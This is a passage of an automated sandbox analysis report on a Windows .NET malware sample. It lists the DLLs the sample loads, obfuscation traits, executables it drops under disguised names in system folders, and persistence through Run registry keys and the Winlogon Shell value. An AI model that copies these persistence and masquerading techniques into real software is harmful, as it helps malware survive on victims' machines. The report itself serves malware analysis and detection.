                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sppc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasman.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: edputil.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: netutils.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: slc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: userenv.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: version.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: wldp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Directory created: C:\Program Files\Windows Multimedia Platform\dllhost.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Directory created: C:\Program Files\Windows Multimedia Platform\5940a34987c991
                            Source: PlZA6b48MW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: PlZA6b48MW.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: PlZA6b48MW.exe Static file information: File size 1917440 > 1048576
                            Source: PlZA6b48MW.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1d3a00
                            Source: PlZA6b48MW.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.pdb source: PlZA6b48MW.exe, 00000000.00000002.1749070482.000000000309B000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: em.pdb source: WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.2404697406.000000001B342000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: PlZA6b48MW.exe, CLZOU1nWue0Qdk97iqU.cs .Net Code: Type.GetTypeFromHandle(jglbD96jbP5TJFuG4Wy.QxnrBGMH3aW(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(jglbD96jbP5TJFuG4Wy.QxnrBGMH3aW(16777245)),Type.GetTypeFromHandle(jglbD96jbP5TJFuG4Wy.QxnrBGMH3aW(16777259))})
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"
                            Source: PlZA6b48MW.exe, Static PE information: section name: .text entropy: 7.542820283476374
                            Source: dllhost.exe.0.dr, Static PE information: section name: .text entropy: 7.542820283476374
                            Source: WtHZilDMhVnOIkoIfPBLn.exe.0.dr, Static PE information: section name: .text entropy: 7.542820283476374
                            Source: PlZA6b48MW.exe.0.dr, Static PE information: section name: .text entropy: 7.542820283476374
                            Source: WtHZilDMhVnOIkoIfPBLn.exe0.0.dr, Static PE information: section name: .text entropy: 7.542820283476374
                            Source: PlZA6b48MW.exe, High entropy of concatenated method names

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: unknown, Executable created and started: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\YNJEaDTu.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\Default\AppData\Roaming\WtHZilDMhVnOIkoIfPBLn.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, File created: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe, File created: C:\Users\user\Desktop\LARQmQKJ.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\kkpLxnoP.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\UqqnPMXK.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Program Files\Windows Multimedia Platform\dllhost.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\MiiYvNyr.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\nIcTiRiZ.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\OeqoqbNM.log
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe, File created: C:\Users\user\Desktop\RCSpyiiu.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\mSTLtqAw.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\ZBNMMRPs.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\ZwLVNbth.log
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe, File created: C:\Users\user\Desktop\bTenUpua.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\uWGScrdc.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\CwRRQJIe.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\dZJDzodr.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\euKdPjTG.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\IXnYeTUQ.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\kAfKNzod.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File created: C:\Users\user\Desktop\FvWYGyIe.log
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe, File created: C:\Users\user\Desktop\GOnzOWoM.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\IXnYeTUQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\CwRRQJIe.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\kkpLxnoP.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\ZwLVNbth.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\nIcTiRiZ.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\UqqnPMXK.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\ZBNMMRPs.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\YNJEaDTu.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\OeqoqbNM.log
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe File created: C:\Users\user\Desktop\LARQmQKJ.log
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe File created: C:\Users\user\Desktop\bTenUpua.log
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe File created: C:\Users\user\Desktop\RCSpyiiu.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\mSTLtqAw.log
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe File created: C:\Users\user\Desktop\MiiYvNyr.log

                            Boot Survival

                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLn
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MW
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLn
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MW
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
